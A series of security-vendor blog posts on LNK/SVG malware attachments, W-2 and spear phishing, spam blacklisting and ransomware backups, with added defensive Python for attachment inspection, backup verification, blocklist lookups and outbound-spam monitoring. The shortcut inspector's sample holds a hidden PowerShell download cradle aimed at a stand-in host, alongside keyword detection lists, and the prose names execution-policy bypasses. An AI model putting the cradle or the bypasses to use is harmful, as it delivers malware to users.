Spammers and scammers are constantly updating their malware distribution tactics to ensure their malicious payloads are delivered to unsuspecting end users. However, Microsoft has spotted a major change to malware distribution tactics used by cybercriminals. The change has prompted the software giant to issue a new warning.
Malware, including ransomware, is commonly distributed via spam email. Links to malicious websites are used in an attempt to bypass spam filter controls; however, malicious attachments are the delivery mechanism of choice for many cybercriminal gangs. Malicious links are commonly blocked by web filtering solutions – WebTitan for example prevents all users from visiting websites known to be malicious.
To bypass spam filter controls, attachments rarely contain the actual malware or ransomware executable. Instead, the attachment carries a small script (a downloader) which, once opened, fetches the malicious payload from a server controlled by the attacker.
Because these script-based downloaders are now easily identified, malware distribution tactics have changed. Rather than using these obviously suspect file types, cybercriminals have switched to file types that look less dangerous. Microsoft has noticed a trend for the use of LNK files and SVG files that launch malicious PowerShell scripts.
LNK files are Windows shortcut files. A shortcut normally points to an executable, but its target field can hold an entire command line, so a malicious shortcut can launch PowerShell with the arguments needed to download and run a payload. SVG (Scalable Vector Graphics) files are image files and look far more innocuous. Although they are associated with design software such as Adobe Illustrator, an SVG file is XML that may contain embedded script, and on a typical Windows system double-clicking one opens it in a web browser, which runs that script. Double clicking on these malicious LNK and SVG files therefore launches PowerShell scripts that download malware or ransomware.
Protecting against these types of attacks may seem fairly straightforward. It is possible, for example, to set a PowerShell execution policy that prevents unsigned scripts from running. However, the execution policy was never designed as a security boundary and is easily bypassed: PowerShell can be started with the -ExecutionPolicy Bypass switch, and script text can be fed to the interpreter without ever being run as a script file. Intel Security has recently explained one such method: “PowerShell’s Get-Content can access the content of a .ps2 malware script and pass it to Invoke-Expression (iex) for execution.” Controls that do hold up are application control (AppLocker, for example) to stop unapproved script hosts from launching, and PowerShell script block logging, which records the decoded script regardless of how it was launched.
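As an added example that is not part of the original article or of Microsoft's research, the following Python script shows how a mail gateway or an analyst can look inside these two attachment types without opening them. It parses the string fields of a .lnk file (the MS-SHLLINK format: a fixed header, an optional IDList and LinkInfo, then the name, relative path, working directory, arguments and icon strings) and flags shortcuts whose target or arguments start a script host with download-cradle keywords; it also checks an SVG for embedded script. The shortcut bytes are built inline by build_lnk so that the script runs offline; the launcher and keyword lists, the file names and the example.invalid URL are assumptions made for the example.

```python
import re
import struct

# Shell link header constants from the MS-SHLLINK specification
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 1 << 0, 1 << 1, 1 << 2, 1 << 3
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 4, 1 << 5, 1 << 6, 1 << 7
STRING_FIELDS = (   # StringData sections appear after the header, IDList and LinkInfo in this fixed order
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
)

# Illustrative indicators: assumptions made for this example, not a complete signature set
LAUNCHERS = re.compile(r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b", re.I)
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|frombase64string"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-exec\S*\s+bypass|https?://", re.I)
SVG_SCRIPT = re.compile(r"<script\b|\bon(load|click|mouseover|error)\s*=|javascript:", re.I)
SVG_HOST = re.compile(r"ActiveXObject|WScript\.Shell|powershell", re.I)


def build_lnk(relative_path, arguments, working_dir=""):
    """Constructed minimal Unicode .lnk with only the string data a downloader shortcut needs
    (real shortcuts usually also carry an IDList and LinkInfo, which parse_lnk skips over)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE | (HAS_WORKING_DIR if working_dir else 0)
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))   # attributes, timestamps, size, icon, show cmd, hotkey, reserved

    def string_data(s):   # CountCharacters (2 bytes) then UTF-16LE characters, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + (string_data(working_dir) if working_dir else b"") + string_data(arguments)


def parse_lnk(data):
    """Return the StringData fields (name, relative_path, working_dir, arguments, icon_location) of a shell link."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != struct.pack("<I", LNK_HEADER_SIZE) or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:                 # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                           # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    fields = {}
    for flag, name in STRING_FIELDS:
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            pos += 2 + count * width
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return fields


def lnk_findings(data):
    """Why a shortcut attachment looks like a script-based downloader (an empty list means nothing was seen)."""
    fields = parse_lnk(data)
    command_line = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    findings = []
    if LAUNCHERS.search(command_line):
        findings.append("script-host launcher")
    if CRADLE.search(command_line):
        findings.append("download/obfuscation keywords")
    return findings


def svg_findings(text):
    """SVG is XML that may embed script, and Windows opens it in a browser, so any script content is a finding."""
    findings = []
    if SVG_SCRIPT.search(text):
        findings.append("embedded script")
    if SVG_HOST.search(text):
        findings.append("script-host invocation")
    return findings


if __name__ == "__main__":
    # Constructed samples: a harmless shortcut and one that starts a hidden PowerShell download cradle
    benign = build_lnk(r".\notes.txt", "")
    cradle = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "-w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\"")
    print(parse_lnk(cradle)["arguments"])
    print(lnk_findings(benign), lnk_findings(cradle))
    print(svg_findings('<svg xmlns="http://www.w3.org/2000/svg"><script>new ActiveXObject("WScript.Shell")</script></svg>'))
```

The check deliberately looks at the command line a shortcut would run rather than at its icon or display name, because the icon is exactly what the attacker controls to make the file look like a document. For SVG, the safest gateway policy is to treat the file as active content rather than as an image, since the browser that opens it will run whatever script it contains.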
A W-2 Form phishing scam that has been extensively used to con businesses out of the tax information of their employees is now being used on educational institutions. School districts need to be on high alert as cybercriminals have them fixed in their cross-hairs.
Over the past few weeks, many school districts have fallen victim to the scammers and have disclosed the W-2 Form data of employees. Teachers, teaching assistants, and other members of school staff have had their Social Security numbers and earnings information sent to fraudsters. The data are used to file fraudulent tax returns in victims’ names.
At face value, the W-2 Form phishing scam is one of the simplest con-tricks used by cybercriminals. It involves sending an email to a member of the HR or payroll team asking for the W-2 Forms of all employees to be sent via email. Why would any employee send this highly sensitive data? Because the email appears to have been sent from individuals within the school district who have a genuine need for the information. This is why the W-2 Form phishing scam is so effective. In many cases, suspicions are not aroused for a number of days after the emails have been sent. By that time, fraudulent tax returns may have been filed in the names of all of the victims.
It is unknown how many school districts have been targeted to date with this W-2 Form phishing scam, although 10 school districts in the United States have announced that their employees have fallen for the scam this year and have emailed W-2 Form data to the attackers. In total, 23 organizations have announced that an employee has fallen for a W-2 Form phishing scam in 2017, and at least 145 organizations fell for similar scams last year.
Due to the number of attacks, the IRS issued a warning in early 2016 to alert all organizations to the threat. The increase in attacks in 2017 has prompted the IRS to issue a warning once again. While corporations are at risk, the IRS has issued a warning specifically mentioning school districts, as well as non-profits and tribal organizations.
The IRS warning explains how cybercriminals have started even earlier this year. While the W-2 Form phishing scam emerged last year, many attacks occurred relatively late in the tax season. Cybercriminals are attempting to get the data sooner this year. The sooner a fake tax return is filed, the greater the chance that a refund will be issued.
A variety of spoofing techniques are employed to make the email appear to have come from the email account of an executive or another senior individual in the organization: the From address may be forged outright, the display name may match the executive while the underlying address does not, or a lookalike domain may be registered for the purpose. In some cases, criminals have first compromised the email account of a board member, making the scam harder to identify.
This year has also seen a new twist to the scam with victims targeted twice. In addition to the W-2 Form scam, the victims are also subjected to a wire transfer scam. After W-2 Forms have been sent, a wire transfer request is made to the payroll department. Some organizations have been hit with both scams and have disclosed employees’ tax information and then made a wire transfer of several thousand dollars to the same attackers.
Protecting against these scams requires a combination of technology, training and policy/procedural updates. The first step for all organizations – including school districts – is to send an email to all HR and payroll staff warning them about these phishing scams. Staff must be made aware of the scam and told to be vigilant.
Policies and procedures should be updated to require payroll and HR staff to authenticate any email request for W-2 Form data by telephone, using a number already on file rather than one supplied in the email, before sending the information.
An advanced spam filter – such as SpamTitan – can also greatly reduce the risk of W-2 Form scam emails being delivered to end users’ inboxes. Blocking suspicious emails will reduce reliance on training and user awareness of these scams. The spam filter will also be effective at blocking further scams and other malicious emails from being delivered.
Research conducted by the anti-phishing training company PhishMe has shown a worrying increase in phishing attacks in 2016 and has highlighted the importance of taking steps to reduce the risk of spear phishing attacks.
Unfortunately, cybercriminals are becoming much more adept at crafting highly convincing spear phishing campaigns. A wide range of social engineering techniques are used to fool employees into responding to the emails and the campaigns are becoming much harder to identify.
Responding to these emails can result in email and network credentials being compromised, malware and ransomware being installed on corporate networks, and sensitive data being emailed to the attackers.
The study of phishing attacks in 2016 showed attacks increased by 55% year on year. PhishMe research shows that out of the successful data breaches in 2016, 90% started with a spear phishing email.
In 2016, business email compromise attacks rose by an incredible 1300%, while ransomware attacks increased 400%. Cybercriminals are attacking companies with a vigor never before seen and unfortunately many of those attacks have been successful.
The figures from the U.S. Department of Health and Human Services’ Office for Civil Rights – which tracks U.S. healthcare data breaches – show that 2016 was the worst ever year on record for healthcare data breaches. At least 323 breaches of more than 500 records occurred in 2016. Undoubtedly many more breaches have yet to be discovered.
Cybercriminals and hackers have employees firmly in their crosshairs. Unfortunately, employees are easy targets. A recent survey conducted by cybersecurity firm Avecto showed that 65% of employees are now wary about clicking on links emailed to them by strangers. Alarmingly, that means 35% are not.
The same survey showed that 68% of respondents have no concerns about clicking on links sent by their friends and colleagues. Given the extent to which email addresses and passwords have been compromised in the last year, this is incredibly worrying. 1 billion Yahoo accounts were breached and 117 million email addresses were compromised as a result of the LinkedIn breach. Gaining access to email accounts is not a problem for cybercriminals. If those accounts are used to send spear-phishing emails, the chance of links being clicked are very high. Unfortunately, all it takes is for one email account to be compromised for access to a network to be gained.
The risk of spear phishing attacks was clearly demonstrated in 2015 when the largest ever healthcare data breach was discovered. The records of 78.8 million health plan members were stolen from Anthem Inc. That breach occurred as a result of an employee of one of the insurer’s subsidiaries responding to a spear phishing email.
Anthem Inc. is the second largest health insurer in the United States and spends many tens of millions of dollars on highly complex cybersecurity defenses. Those multi-million dollar defenses were undone with a single email.
Organizations must take steps to reduce the risk of spear phishing attacks. Unfortunately, there is no single solution that eradicates the risk; a multi-layered defense strategy is required.
An advanced anti-spam solution is essential to prevent the vast majority of spam and phishing emails from being delivered to end users. SpamTitan for example, blocks 99.97% of spam email and 100% of known malware.
Employees must be trained and their training must be tested with phishing exercises. Practice really does make perfect when it comes to identifying email scams. Endpoint defenses should also be employed, along with anti-virus and antimalware software.
The risk of spear phishing attacks will increase again in 2017. Doing nothing to improve cybersecurity defenses and combat the spear phishing risk could prove to be a very costly mistake.
All antispam solutions and spam filters check inbound messages for common spam signatures; however, it is also important to choose a solution that performs outbound email scanning. Outbound email scanning ensures spam emails, or emails containing malware, are not sent from an organization’s email accounts or domains.
Your employees would be unlikely to knowingly use their corporate email accounts to send spam emails, but malware infections can allow cybercriminals to gain access to email accounts and use them to send high volumes of spam email messages. Cybercriminals could also compromise email accounts and use an organization’s domain to send malware and ransomware to clients and customers.
Should this happen, it can have a seriously detrimental effect on an organization’s reputation and may result in corporate email accounts or an entire domain being blacklisted.
Blacklists are maintained by a number of organizations, spamhaus.org for example. Internet Service Providers (ISPs), mail servers, and antispam solutions check these blacklists before accepting email for delivery to end users. If a particular IP address, email account, or domain is listed in one of the blacklist databases, emails sent from it are likely to be rejected or quarantined rather than delivered.
Blacklists are updated in real-time and contain many millions of blocked domains and email addresses that have been reported as having been used for unwanted activity such as the sending of spam emails. If emails are sent from a blacklisted account, domain, or IP address those emails will either be directed to a quarantine folder, deleted, or will simply be rejected.
If a business has its domain added to a spam blacklist important emails to clients and customers will not get through. This can prove costly, as real estate firm Keller Williams has recently discovered.
Blacklisted Domains and Email Accounts Can Prove Costly for Businesses
Over the past few days, email messages sent from the kw.com domain used by Keller Williams have been rejected by AOL. Yahoo has been blocking emails from the kw.com account for some time. The problem appears to be the addition of the kw.com domain to spam blacklists.
If a Keller Williams real estate agent needs to send an email to a customer who has an AOL or Yahoo account, it will not be delivered. Agents have therefore been forced to get customers to open Google email accounts in order to send online paperwork or documents requiring e-signatures.
The issue also affects online paperwork sent via the transaction management software program Ziplogix, with one Keller Williams agent also claiming Dotloop is also affected. Some agents at Keller Williams have reportedly had to send important paperwork for listings and sales via personal email accounts to ensure emails are delivered.
The AOL website explains that when domains have been flagged as being abusive, the server will be temporarily blocked until the spamming stops. Until a domain is removed from its blacklist, AOL account holders will be prevented from receiving emails from the blocked domain. Removing the domain from the blacklist can take up to a week.
Removing a domain from the 80+ commonly used spam blacklists can be a time-consuming task; furthermore, if spam emails are sent from the account again, the domain will simply be added to the blacklists once more.
Outbound Email Scanning Prevents the Blacklisting of an Organization’s Domain
Unlike many third-party antispam solutions, SpamTitan checks incoming email messages for spam signatures and also performs outbound email scanning. If an email account has been compromised and is being used to send spam, or if malware on an infected machine is sending spam through the organization’s mail server, those messages will be blocked before they leave. Outbound email scanning is an important protection that prevents an organization’s domain or email accounts from being used to send spam or malware.
Organizations can therefore avoid the embarrassment and reputation damage that results from being suspected as engaging in spamming or malware delivery. They can also rest assured that in addition to blocking 99.97% of inbound email spam, their domains and email accounts will not be added to spam blacklists.
The Federal Trade Commission (FTC) in the United States has responded to the current ransomware epidemic by issuing ransomware advice for businesses and consumers. The FTC ransomware advice for businesses follows a spate of high profile ransomware attacks on U.S. businesses. The threat has prompted many U.S. government agencies to release ransomware advice for businesses in the past few months.
Ransomware is a form of malware that encrypts files on a victim’s computer and prevents them from being accessed. After a computer is infected, the attackers issue a ransom demand. In order to obtain the key to unlock the encryption the victim is required to pay a ransom. The ransom amount can be set by the attackers, although it is often around $500 per infected computer.
Ransomware has proved incredibly popular with cybercriminals as it offers a quick source of revenue. Since payment is made in a pseudonymous cryptocurrency such as Bitcoin, money can be collected with little fear of being caught.
The scale of the problem has been shown by numerous reports by security firms. This month, SentinelOne released the results of a global survey that showed 48% of organizations had experienced at least one ransomware attack in the past 12 months. The companies that had been attacked had been forced to deal with an average of 6 ransomware incidents in the past year.
A report released by Beazley’s Breach Response Unit suggests ransomware attacks between January and September were four times higher than in 2015, while a report from Kaspersky Lab suggests there has been an eightfold increase in attacks in the past year.
Ransomware is installed via a number of different attack vectors. Ransomware gangs use exploit kits on websites that probe for vulnerabilities in browsers. Those vulnerabilities are leveraged to download ransomware. Malvertising is also used. This is the use of third party ad networks to spread malware. Adverts are created containing malicious code which directs users to websites that silently download ransomware. Ransomware downloaders were also allegedly sent out via Facebook Messenger this week.
While not all ransomware attacks result in files being encrypted, attacks carry a significant cost. SentinelOne suggests that in the United States, organizations spend an average of 38 man-hours restoring files from backups after a ransomware attack. Additional investment in security is also required after an attack.
Since ransomware can spread laterally across a network, a single infection can result in many computers being infected. Ransom demands of the order of tens of thousands of dollars are not uncommon. The recent ransomware attack on the San Francisco ‘Muni’ rail system saw a ransom demand of $73,000 issued.
Ransomware Advice for Businesses
Unfortunately, antivirus software can be ineffective at preventing ransomware attacks. Businesses looking to defend against ransomware must therefore use a range of techniques. These include:
- Keep all software up to date and apply patches promptly
- Set antivirus and antimalware programs to update their definitions automatically
- Use endpoint security controls to prevent ransomware from being installed
- Implement a robust spam filter to prevent malicious emails from being delivered to end users
- Use a web filtering solution to prevent employees from visiting malicious websites and to monitor users’ online activities for high-risk behaviour
- Use intrusion prevention software
- Train the workforce on security best practices and test that knowledge to ensure the training has been effective
- Ensure all members of staff know whom to contact and what to do if they believe they have inadvertently installed malicious software
To avoid paying a ransom, it is essential to perform regular backups of data. Multiple backup copies should be kept to minimize the risk of data loss, and at least one copy should be stored offline or on an air-gapped device so that the backups themselves cannot be encrypted by ransomware that reaches the network. Backups should also be tested by restoring from them periodically; a backup that has never been restored is an assumption, not a recovery plan. A ransomware response plan should also be developed to reduce disruption to the business in the event of an attack.
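As an added example (not from the FTC guidance or the original article), the following Python code implements the backup check a practitioner would want alongside that advice: it records a SHA-256 manifest of a backup tree and later verifies the tree against it, reporting files that are missing, files whose contents changed, files that changed and now have the near-8-bits-per-byte entropy of encrypted data, and files that appeared since the manifest was taken (a dropped ransom note, for instance). The scenario in demo builds a temporary directory and simulates the ransomware pass; the entropy threshold and the file names are assumptions made for the example.

```python
import hashlib
import math
import tempfile
from collections import Counter
from pathlib import Path

ENTROPY_THRESHOLD = 7.5   # bits per byte; encrypted (or compressed) data sits close to 8.0 (assumption)


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def shannon_entropy(data):
    """Bits of entropy per byte: 0 for a constant stream, 8 for a uniform one."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in Counter(data).values())


def build_manifest(root):
    """SHA-256 of every file under the backup root, keyed by relative POSIX path (taken when the backup is written)."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p) for p in sorted(root.rglob("*")) if p.is_file()}


def verify_backup(root, manifest):
    """Compare the backup tree against its manifest. Any difference means the copy is no longer trustworthy."""
    root = Path(root)
    report = {"missing": [], "changed": [], "high_entropy": [], "added": []}
    for rel, digest in manifest.items():
        path = root / rel
        if not path.is_file():
            report["missing"].append(rel)
        elif sha256_file(path) != digest:
            report["changed"].append(rel)
            if shannon_entropy(path.read_bytes()) >= ENTROPY_THRESHOLD:
                report["high_entropy"].append(rel)      # changed and now looks like ciphertext
    report["added"] = [rel for rel in build_manifest(root) if rel not in manifest]   # e.g. a ransom note
    return report


def backup_is_intact(report):
    return not any(report.values())


def demo():
    """Constructed scenario: take a manifest, then simulate a ransomware pass over the backup tree."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "payroll").mkdir()
        (root / "payroll" / "q1.csv").write_text("name,amount\nalice,100\n" * 200)
        (root / "notes.txt").write_text("meeting notes " * 100)
        manifest = build_manifest(root)
        before = verify_backup(root, manifest)
        (root / "payroll" / "q1.csv").write_bytes(bytes(range(256)) * 16)   # overwritten with ciphertext-like data
        (root / "notes.txt").unlink()                                         # deleted
        (root / "README_DECRYPT.txt").write_text("Your files are encrypted. Pay to recover them.")
        after = verify_backup(root, manifest)
        return before, after


if __name__ == "__main__":
    before, after = demo()
    print("intact before:", backup_is_intact(before))
    print("after:", after)
```

The manifest only helps if the attacker cannot rewrite it, so store it with the offline copy or sign it. An entropy jump on a file that is supposed to be text or a spreadsheet is a reason to stop the backup rotation before the encrypted copy overwrites the last good one.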
Knowing how to avoid email server blacklisting is vitally important for any organization that relies on email as a channel of communication. The consequences of your email server being blacklisted can be costly, inconvenient, and potentially damaging to your organization´s credibility.
To best understand what email server blacklisting might mean to your organization, it is ideal to have a little knowledge about how email server filters work. Consequently we have divided this post into three sections explaining a little about email server filters, what may cause your email server to be blacklisted, and how to avoid email server blacklisting.
A Little about Email Server Filters
Most email filters do not run on the mail server itself. They are delivered either as a cloud service or as a virtual appliance installed between your firewall and your email server, and in both cases they inspect mail before it reaches the server. The practical distinction between the two is deployment: virtual appliances can be more appropriate for some larger organizations that want the filter inside their own network.
Regardless of how they are deployed, email filters work in much the same way: fast front-end tests detect and reject the majority of spam emails before a deeper analysis is conducted of the email that remains. One of these front-end tests compares the IP address that delivered each email against a list of known sources of spam. Such a list is known as a Realtime Block List (RBL) or, because the lookup is made with a DNS query, a DNS-based blocklist (DNSBL).
If your organization’s IP address appears on such a list, much of your outbound mail will be rejected or quarantined by the many filters that consult it until the address is removed, something that can take anything from 24 hours to six months to resolve completely. During this time you will have to ask your customers and other contacts to add your email address to a safe list or “whitelist”.
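The lookup itself is simple enough to show. As an added example (not from the original article or from any blocklist operator), the following Python code builds the DNS query names used by IP blocklists (the reversed address labels under the list's zone) and by the URI blocklists such as SURBL and URIBL that filters apply to links (the domain under the zone), and interprets the 127.0.0.x answers. This also illustrates the blacklist checks described earlier on this page. The resolver is injectable so the example runs offline against a constructed answer table; the zone names are an assumption, and the Spamhaus answer codes are as documented at the time of writing and should be re-checked against the operator's current documentation.

```python
import ipaddress
import socket

# Illustrative zones (assumption for the example): read each list's terms of use before querying it
IP_BLOCKLISTS = ("zen.spamhaus.org", "bl.spamcop.net")
URI_BLOCKLISTS = ("multi.surbl.org", "multi.uribl.com")
# Spamhaus ZEN answer codes as documented at the time of writing; every list defines its own codes
ZEN_CODES = {
    "127.0.0.2": "SBL: verified spam source",
    "127.0.0.3": "SBL CSS: low-reputation/snowshoe source",
    "127.0.0.4": "XBL: exploited or compromised host",
    "127.0.0.9": "SBL: DROP/EDROP range",
    "127.0.0.10": "PBL: end-user address that should not send mail directly",
    "127.0.0.11": "PBL: Spamhaus-maintained policy block",
}
ERROR_PREFIX = "127.255.255."                      # Spamhaus signals a rejected query here, not a listing
LISTED_NET = ipaddress.ip_network("127.0.0.0/8")   # any other loopback answer means "listed"


def ip_query_name(ip, zone):
    """Reverse the address labels (IPv4 octets or IPv6 nibbles) and append the zone."""
    addr = ipaddress.ip_address(ip)
    labels = addr.reverse_pointer.replace(".in-addr.arpa", "").replace(".ip6.arpa", "")
    return f"{labels}.{zone}"


def domain_query_name(domain, zone):
    """URI blocklists (SURBL/URIBL) are keyed by the domain found in a link."""
    return f"{domain.strip('.').lower()}.{zone}"


def system_resolve(name):
    """A records via the host's resolver; NXDOMAIN (not listed) becomes an empty list."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except socket.gaierror:
        return []


def check_ip(ip, zones=IP_BLOCKLISTS, resolve=system_resolve):
    """Map each zone that answered to its explanations. Errors stay visible but are not listings."""
    hits = {}
    for zone in zones:
        reasons = []
        for answer in resolve(ip_query_name(ip, zone)):
            if answer.startswith(ERROR_PREFIX):
                reasons.append(f"query error {answer}: do not treat as listed")
            elif ipaddress.ip_address(answer) in LISTED_NET:
                default = f"listed ({answer})"
                reasons.append(ZEN_CODES.get(answer, default) if zone.endswith("spamhaus.org") else default)
        if reasons:
            hits[zone] = reasons
    return hits


def is_listed(hits):
    return any(not reason.startswith("query error") for reasons in hits.values() for reason in reasons)


def check_domains(domains, zones=URI_BLOCKLISTS, resolve=system_resolve):
    return {d: [z for z in zones if resolve(domain_query_name(d, z))] for d in domains}


def make_fake_resolver(table):
    """Offline stand-in for DNS: a dict of query name -> A records."""
    return lambda name: list(table.get(name, []))


def constructed_answers():
    """Constructed DNS answers standing in for the real lists (192.0.2.0/24 is documentation space)."""
    return {
        "10.2.0.192.zen.spamhaus.org": ["127.0.0.4", "127.0.0.10"],
        "10.2.0.192.bl.spamcop.net": ["127.0.0.2"],
        "11.2.0.192.zen.spamhaus.org": ["127.255.255.254"],
        "malicious.example.multi.surbl.org": ["127.0.0.8"],
    }


if __name__ == "__main__":
    resolve = make_fake_resolver(constructed_answers())
    print(check_ip("192.0.2.10", resolve=resolve))
    print(check_domains(["malicious.example", "example.org"], resolve=resolve))
```

Two cautions: query through your own caching resolver, since Spamhaus refuses queries from open public resolvers and answers with an error code rather than a listing; and run the same check against your own outbound IP addresses on a schedule, so that a listing is discovered by you rather than by your customers.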
Why Was My Email Server Blacklisted?
There are several reasons why an email address (or IP address) can be blacklisted, and it is important to find out the exact reason(s) before trying to get your organization´s IP address removed from the Realtime Block List. If you fail to identify the cause, and fail to take steps to avoid email server blacklisting in the future, it can be much tougher to get un-blacklisted second time around.
Blacklisting typically occurs for one of several reasons:
- A machine on your network has been infected with spambot malware that sends spam from your IP address, or relays it through your mail server, without anyone in the organization being aware of it.
- Someone in your organization may have revealed their login credentials and a spammer is using that information to send spam emails from the end-user´s email account.
- Emails sent innocently from one or more end-user accounts have had a high proportion of spam-related keywords, or have had infected files attached to them.
The last scenario is entirely possible if an end-user has prepared a presentation or spreadsheet on an infected home computer and brought the infected file into the workplace on a flash drive. Most email filters include antivirus scanning that identifies malware in attachments. If the infected attachment is sent to multiple recipients, and identified by multiple email filters, your organization’s IP address can quickly be blacklisted.
How to Avoid Email Server Blacklisting
Ideally, organizations should be able to avoid email server blacklisting by having robust antivirus protection and educating their end-users about online security. There should also be an email usage policy in place that would avoid email server blacklisting due to inappropriate content or unsafe attachments – even when these events occur inadvertently.
Unfortunately end-users are the weakest link in the security chain, and it only takes one end-user to click on a malicious URL or reveal their login credentials for an organization’s IP address to be blacklisted. In fact, if blacklisting is the worst consequence of a security breach, your organization has got off lightly and should consider itself lucky that the consequences were not far more serious.
Consequently, the best way to avoid email server blacklisting is with an email filter that has malicious URL blocking to prevent end-users visiting malware-infested websites, phishing protection to reject emails directing an end-user to a fake website, and outbound scanning to identify potential spam and infections contained in, or attached to, outgoing emails.
Avoid Email Server Blacklisting with SpamTitan
Not all email filtering solutions have mechanisms to avoid email server blacklisting. However, SpamTitan has taken these factors into account in the design of SpamTitan Cloud and SpamTitan Gateway. Both of our email filtering solutions use URIBL and SURBL lookups to compare links contained within inbound emails and their attachments against global blacklists of known malicious and phishing sites.
The same lookups, along with several other mechanisms, are used in the scanning of outbound mail to ensure it is clear of viruses and could not be interpreted as having spammy content. Outbound scanning also identifies spam emails originating from a spambot or a compromised email account, preventing them from being sent and so avoiding email server blacklisting.
Naturally, you do not want your end-users to be under the impression that their emails have been sent when they are caught by the outbound filter. So SpamTitan Cloud and SpamTitan Gateway have comprehensive reporting features that advise of any problems in order that the problems can be rectified quickly and effectively – certainly more quickly than trying to get your organization´s IP address removed from a Realtime Block List.
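As an added example (not SpamTitan's code, nor from the original articles), the following Python code shows the core of an outbound volume check of the kind described above and in the earlier post on outbound scanning: it parses Postfix queue-manager log lines for the sender and recipient count of each outbound message and raises an alert for any sender whose message or recipient volume within a sliding window exceeds a limit, which is the signature of a compromised account or a spambot relaying through the server. The log lines are constructed inline, and the thresholds and the 2017 year used to complete syslog timestamps are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Postfix queue-manager line for a message entering the active queue (sender and recipient count)
QMGR_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ postfix/qmgr\[\d+\]: (?P<qid>[0-9A-F]+): "
    r"from=<(?P<sender>[^>]*)>, size=\d+, nrcpt=(?P<nrcpt>\d+) \(queue active\)$"
)
LOG_YEAR = 2017   # syslog timestamps carry no year (assumption for the example)


def parse_qmgr(lines, year=LOG_YEAR):
    """Return (timestamp, sender, recipient count) for each queue-active line; other lines are ignored."""
    events = []
    for line in lines:
        m = QMGR_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["sender"].lower(), int(m["nrcpt"])))
    return events


def outbound_alerts(events, window_minutes=10, max_messages=20, max_recipients=50, exempt=()):
    """Sliding-window volume check per sender. Returns (sender, window start, messages, recipients)
    for the first window in which a sender exceeds either limit; the limits are illustrative."""
    window = timedelta(minutes=window_minutes)
    by_sender = defaultdict(list)
    for ts, sender, nrcpt in sorted(events):
        if sender and sender not in exempt:          # bounces carry an empty sender; exempt = known bulk senders
            by_sender[sender].append((ts, nrcpt))
    alerts = []
    for sender, items in by_sender.items():
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            messages = end - start + 1
            recipients = sum(n for _, n in items[start:end + 1])
            if messages > max_messages or recipients > max_recipients:
                alerts.append((sender, items[start][0].isoformat(), messages, recipients))
                break                                 # one alert per sender; hold further mail and investigate
    return alerts


def constructed_log():
    """Constructed Postfix log: a normal user, an unrelated smtp line, a bounce, and a compromised account."""
    def qmgr(ts, qid, sender, nrcpt):
        return f"{ts:%b %d %H:%M:%S} mx1 postfix/qmgr[2211]: {qid}: from=<{sender}>, size=2048, nrcpt={nrcpt} (queue active)"
    base = datetime(LOG_YEAR, 3, 14, 9, 0, 0)
    lines = [qmgr(base + timedelta(minutes=7 * i), f"A{i:04X}", "alice@example.com", 1) for i in range(3)]
    lines.append(f"{base:%b %d %H:%M:%S} mx1 postfix/smtp[2299]: A0000: to=<x@example.net>, relay=mail.example.net, status=sent (250 Ok)")
    lines.append(qmgr(base + timedelta(minutes=20), "C0001", "", 1))
    lines += [qmgr(base + timedelta(minutes=30, seconds=5 * i), f"B{i:04X}", "bob@example.com", 5) for i in range(30)]
    return lines


if __name__ == "__main__":
    for alert in outbound_alerts(parse_qmgr(constructed_log())):
        print("hold outbound mail for", *alert)
```

In practice the limits should come from each sender's own history rather than a single global number, and the action on an alert is to hold the sender's queue and force a password reset, not merely to log it.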
The FBI issued a new public service announcement which includes new business email compromise scam data. The new data indicates U.S. businesses have lost almost $960 million to business email compromise scams in the past three years, and the total losses from these scams is now almost $3.1 billion.
What is a Business Email Compromise Scam?
